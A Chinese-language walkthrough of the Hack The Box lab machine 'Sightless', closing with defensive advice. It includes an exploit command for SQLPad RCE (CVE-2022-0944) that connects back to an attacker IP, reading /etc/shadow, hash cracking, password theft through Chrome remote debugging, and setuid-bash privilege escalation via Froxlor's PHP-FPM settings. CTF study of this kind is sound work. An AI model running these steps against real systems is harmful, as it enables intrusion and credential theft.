[Meachines] [Easy] Sightless SQLPad-RCE+shadow哈希破译+Chrome远程调试窃取密码+Forxlor-PHP_FPM命令执行权限提升
字数 1291 2025-08-20 18:18:04

Sightless 渗透测试实战教学文档

1. 信息收集阶段

1.1 目标识别

  • 目标IP: 10.10.11.32
  • 域名: sightless.htb 和 sqlpad.sightless.htb
  • 操作系统: Ubuntu Linux (基于SSH版本信息)

1.2 端口扫描结果

使用Nmap进行扫描:

nmap -p- 10.10.11.32 --min-rate 1000 -sC -sV

开放端口:

  • 21/tcp: FTP (ProFTPD Server)
  • 22/tcp: SSH (OpenSSH 8.9p1)
  • 80/tcp: HTTP (nginx 1.18.0)

1.3 服务指纹

  • FTP服务显示特殊响应: "try being more creative"
  • Web服务器为nginx 1.18.0
  • SSH版本显示Ubuntu 3ubuntu0.10

2. Web应用渗透

2.1 域名配置

将目标域名添加到本地hosts文件:

echo '10.10.11.32 sightless.htb' >> /etc/hosts
echo '10.10.11.32 sqlpad.sightless.htb' >> /etc/hosts

2.2 SQLPad漏洞利用

发现SQLPad应用存在CVE-2022-0944漏洞

利用步骤:

  1. 下载漏洞利用脚本: 
    https://github.com/shhrew/CVE-2022-0944
  2. 执行攻击: 
    python3 main.py http://sqlpad.sightless.htb 10.10.16.10 10032
  3. 获取初始访问权限: root(fack) -> michael

3. 权限提升与密码破解

3.1 Shadow哈希获取

进入系统后查看/etc/shadow文件:

cat /etc/shadow

获取到michael用户的哈希:

$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/

3.2 哈希破解

使用hashcat进行破解:

hashcat -a 0 hash /usr/share/wordlists/rockyou.txt --force

破解结果: 密码为"insaneclownposse"

3.3 SSH登录

使用破解的密码通过SSH登录:

ssh michael@10.10.11.32

获取user flag:

75ce007325d8c9b8c70ab263b7b73da8

4. 权限提升技术

4.1 端口转发

建立SSH隧道转发多个端口:

ssh michael@10.10.11.32 \
-L 8080:127.0.0.1:8080 \
-L 3306:127.0.0.1:3306 \
-L 60469:127.0.0.1:60469 \
-L 38871:127.0.0.1:38871 \
-L 35295:127.0.0.1:35295 \
-L 3000:127.0.0.1:3000 \
-L 33060:127.0.0.1:33060

4.2 Chrome远程调试利用

发现john用户以--remote-debugging-port模式启动了Chrome

攻击步骤:

  1. 安装Chrome浏览器(如需): 
    wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
  2. 访问chrome://inspect/#devices
  3. 使用已知凭据登录管理界面:
    • 用户名: admin
    • 密码: ForlorfroxAdmin
  4. 通过Chrome调试器截获John输入的管理员密码

4.3 PHP-FPM命令执行

利用Forxlor的PHP-FPM功能执行命令:

  1. 访问管理界面:

    http://127.0.0.1:8080/admin_phpsettings.php?page=fpmdaemons&action=add

  2. 创建恶意PHP-FPM版本,包含要执行的命令:

    • 方法1: 使用rev.sh脚本 
      cp /bin/bash /tmp;chmod +s /tmp/bash
    • 方法2: 直接命令 
      chmod 4755 /bin/bash

  3. 重启PHP-FPM服务:

    http://127.0.0.1:8080/admin_settings.php?page=overview&part=phpfpm

    先禁用并保存,然后再次启动保存

  4. 执行特权bash:

    /tmp/bash -p

  5. 获取root flag:

    9047f8db692036cd19e6bbfbc92708fb

5. 关键知识点总结

  1. SQLPad漏洞利用: CVE-2022-0944允许远程代码执行
  2. 密码破解技术: 使用hashcat破解shadow哈希
  3. Chrome远程调试: 利用--remote-debugging-port参数窃取敏感信息
  4. PHP-FPM滥用: 通过管理界面配置恶意PHP-FPM实现命令执行
  5. 权限维持: 通过setuid位提升权限

6. 防御建议

  1. 及时更新Web应用(如SQLPad)到最新版本
  2. 使用强密码策略,避免使用常见密码
  3. 限制Chrome远程调试功能的使用
  4. 严格控制PHP-FPM等服务的配置权限
  5. 监控系统日志中的异常行为,如shadow文件访问
Sightless 渗透测试实战教学文档 1. 信息收集阶段 1.1 目标识别 目标IP: 10.10.11.32 域名: sightless.htb 和 sqlpad.sightless.htb 操作系统: Ubuntu Linux (基于SSH版本信息) 1.2 端口扫描结果 使用Nmap进行扫描: 开放端口: 21/tcp: FTP (ProFTPD Server) 22/tcp: SSH (OpenSSH 8.9p1) 80/tcp: HTTP (nginx 1.18.0) 1.3 服务指纹 FTP服务显示特殊响应: "try being more creative" Web服务器为nginx 1.18.0 SSH版本显示Ubuntu 3ubuntu0.10 2. Web应用渗透 2.1 域名配置 将目标域名添加到本地hosts文件: 2.2 SQLPad漏洞利用 发现SQLPad应用存在CVE-2022-0944漏洞 利用步骤: 下载漏洞利用脚本: 执行攻击: 获取初始访问权限: root(fack) -> michael 3. 权限提升与密码破解 3.1 Shadow哈希获取 进入系统后查看/etc/shadow文件: 获取到michael用户的哈希: 3.2 哈希破解 使用hashcat进行破解: 破解结果: 密码为"insaneclownposse" 3.3 SSH登录 使用破解的密码通过SSH登录: 获取user flag: 4. 权限提升技术 4.1 端口转发 建立SSH隧道转发多个端口: 4.2 Chrome远程调试利用 发现john用户以--remote-debugging-port模式启动了Chrome 攻击步骤: 安装Chrome浏览器(如需): 访问chrome://inspect/#devices 使用已知凭据登录管理界面: 用户名: admin 密码: ForlorfroxAdmin 通过Chrome调试器截获John输入的管理员密码 4.3 PHP-FPM命令执行 利用Forxlor的PHP-FPM功能执行命令: 访问管理界面: 创建恶意PHP-FPM版本,包含要执行的命令: 方法1: 使用rev.sh脚本 方法2: 直接命令 重启PHP-FPM服务: 先禁用并保存,然后再次启动保存 执行特权bash: 获取root flag: 5. 关键知识点总结 SQLPad漏洞利用 : CVE-2022-0944允许远程代码执行 密码破解技术 : 使用hashcat破解shadow哈希 Chrome远程调试 : 利用--remote-debugging-port参数窃取敏感信息 PHP-FPM滥用 : 通过管理界面配置恶意PHP-FPM实现命令执行 权限维持 : 通过setuid位提升权限 6. 防御建议 及时更新Web应用(如SQLPad)到最新版本 使用强密码策略,避免使用常见密码 限制Chrome远程调试功能的使用 严格控制PHP-FPM等服务的配置权限 监控系统日志中的异常行为,如shadow文件访问